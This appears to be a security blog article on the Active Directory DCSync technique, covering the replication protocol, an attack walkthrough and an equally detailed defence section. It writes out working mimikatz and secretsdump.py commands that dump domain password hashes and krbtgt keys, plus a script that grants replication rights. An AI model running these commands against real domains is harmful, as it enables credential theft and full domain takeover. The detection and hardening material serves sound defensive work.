DCSync Attack and Defense: Abusing Directory Replication Rights

Active Directory
2026.06.07
Time it takes to read this article 4 minutes.

Disclaimer: This article is for educational purposes and authorized security testing only. Run these techniques exclusively against systems you own or have explicit written permission to assess. Extracting domain credentials without authorization is a crime in virtually every jurisdiction.

Introduction

DCSync is one of the most impactful post-exploitation techniques in an Active Directory environment. Instead of running code on a Domain Controller (DC) to read the NTDS.dit database, an attacker asks the DC nicely to hand over secrets — by pretending to be another DC performing routine replication. The result is the same: NTLM hashes, Kerberos keys, and even cleartext credentials for any account in the domain, including the krbtgt account that underpins Golden Ticket attacks.

In this article you'll learn how the underlying replication protocol works, how to perform DCSync with mimikatz and secretsdump.py, and — given equal weight — how defenders detect and prevent it.

How It Works

Domain Controllers keep their copies of the directory in sync using the Directory Replication Service (DRS) Remote Protocol, exposed over RPC as DRSUAPI (drsuapi, MS-DRSR). The key call is:

  • IDL_DRSGetNCChanges — the RPC operation a DC invokes to pull changes (including secret attributes like unicodePwd, dBCSPwd, supplementalCredentials) from a replication partner.

To invoke it, the caller must hold these extended rights on the domain object:

  • DS-Replication-Get-Changes (GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
  • DS-Replication-Get-Changes-All (GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
  • Optionally DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c)

By default these rights are granted to Domain Admins, Enterprise Admins, and Domain Controllers. The danger is that any other principal granted them — through a misconfigured ACL, a delegated admin, or an attacker who edited the domain DACL — can replicate secrets remotely without ever touching the DC's disk or filesystem. This maps to MITRE ATT&CK T1003.006 (OS Credential Dumping: DCSync).

Prerequisites / Lab Setup

To follow along you need:

  • A test AD forest (e.g., a single DC running Windows Server 2019/2022) and a domain-joined workstation.
  • A controlled account that holds the two replication rights above. In the lab you can grant them explicitly:
# Run on the DC as Domain Admin (LAB ONLY)
# Grant replication rights to a low-priv user to simulate a misconfiguration
$user = "CORP\svc-backup"
Import-Module ActiveDirectory
$acl  = Get-Acl "AD:\DC=corp,DC=local"
$sid  = (Get-ADUser svc-backup).SID
$guidGetChanges    = [GUID]"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
$guidGetChangesAll = [GUID]"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
foreach ($g in @($guidGetChanges,$guidGetChangesAll)) {
  $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $sid,"ExtendedRight","Allow",$g)
  $acl.AddAccessRule($ace)
}
Set-Acl "AD:\DC=corp,DC=local" $acl

Attack Walkthrough

Step 1 — Find principals that can DCSync

Before launching the attack, enumerate who holds replication rights. PowerView is convenient:

# Identify non-default principals with replication rights
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -ResolveGUIDs |
  Where-Object {
    $_.ObjectAceType -match 'Replication-Get-Changes'
  } | Select-Object SecurityIdentifier, ObjectAceType

BloodHound surfaces the same thing graphically via the GetChanges / GetChangesAll / DCSync edges — look for paths from any owned principal to the domain node.

Step 2 — DCSync with mimikatz

On a Windows host, running in the context of (or after impersonating) the privileged account, dump a single high-value account first — krbtgt:

mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

To target a specific DC and a regular user:

mimikatz # lsadump::dcsync /domain:corp.local /dc:DC01.corp.local /user:Administrator

The output includes the NTLM hash (Hash NTLM), Kerberos AES256/AES128/DES keys, and password history — everything needed for pass-the-hash, Kerberoasting offline cracking, or forging a Golden Ticket from the krbtgt key.

Step 3 — DCSync from Linux with secretsdump

From an attacker box (e.g., Kali), Impacket's secretsdump.py performs DCSync remotely with no agent on the DC. The -just-dc switches use DRSUAPI under the hood:

# Dump all domain hashes via DRSUAPI replication
secretsdump.py corp.local/svc-backup:'P@ssw0rd!'@DC01.corp.local -just-dc

# NTLM hashes only (faster, no Kerberos keys)
secretsdump.py corp.local/svc-backup@DC01.corp.local -just-dc-ntlm -hashes :<NTLMHASH>

# Target a single account
secretsdump.py 'corp.local/svc-backup:P@ssw0rd!'@DC01.corp.local -just-dc-user krbtgt

Output is written in user:rid:lmhash:nthash format plus kerberos and cleartext sections. With the krbtgt hash and the domain SID, the engagement effectively pivots to full domain persistence.

Attack Flow Diagram

DCSync Attack and Defense: Abusing Directory Replication Rights diagram 1

Diagram: the attacker impersonates a replication partner and calls IDL_DRSGetNCChanges over DRSUAPI; the DC checks replication rights, reads secrets from NTDS.dit, and returns them.

Detection & Defense (Blue Team)

DCSync is legitimate replication traffic when it comes from a real DC, which makes detection a matter of identifying the source and principal, not the protocol itself.

Detection

  • Network anomaly — replication from a non-DC host. A DsGetNCChanges request originating from any IP that is not a Domain Controller is the single strongest signal. Tools such as Microsoft Defender for Identity and many SIEM rules alert specifically on this ("Suspected DCSync attack").
  • Event log correlation. Enable auditing of Directory Service Access and monitor Event ID 4662 ("An operation was performed on an object") where the Properties field contains the replication GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 or 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 and the Subject account is not a DC computer account. A sample hunting filter:
# Hunt for non-DC accounts invoking replication rights (Event 4662)
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662} |
  Where-Object {
    $_.Message -match '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' -and
    $_.Message -notmatch '\$'   # filter out machine ($) accounts
  } | Format-List TimeCreated, Message
  • Network sensors. Zeek/Suricata signatures and the dce_rpc analyzer can flag DRSUAPI DsGetNCChanges opnum 3 calls from unexpected sources.

Defense / Mitigation

  • Audit and minimize replication rights. Periodically enumerate every principal holding DS-Replication-Get-Changes-All on the domain head and remove any that aren't DCs or strictly required. Repurpose the PowerView/Get-Acl queries above as a recurring control.
  • Protect privileged accounts. Place high-value accounts in Protected Users, enforce tiered administration, and ensure krbtgt is rotated (twice, with a delay) if compromise is suspected — DCSync of krbtgt is the gateway to Golden Tickets. See Active Directory hardening fundamentals.
  • Limit RPC exposure. Restrict which hosts can reach DCs over the RPC/drsuapi interfaces using firewall rules and IPsec, so replication is only possible DC-to-DC.
  • Deploy an identity threat sensor. Defender for Identity, or equivalent, installs on DCs and baselines normal replication partners — it raises high-fidelity alerts when a workstation suddenly speaks DRSUAPI.
  • Alert, don't just log. Wire Event ID 4662 with replication GUIDs into your SIEM with an allowlist of legitimate DC SIDs so any deviation pages the SOC.

Conclusion

DCSync turns a single misconfigured ACL into full-domain credential compromise without dropping a single file on a Domain Controller. The offense is trivial once replication rights are in reach — lsadump::dcsync or secretsdump.py -just-dc and you're done. The defense is equally tractable but requires discipline: keep replication rights minimal, monitor Event 4662 for non-DC principals using the replication GUIDs, and deploy an identity sensor that knows which hosts are supposed to replicate. Treat any DRSUAPI replication from a non-DC as an incident until proven otherwise.

References

Comments

Copied title and URL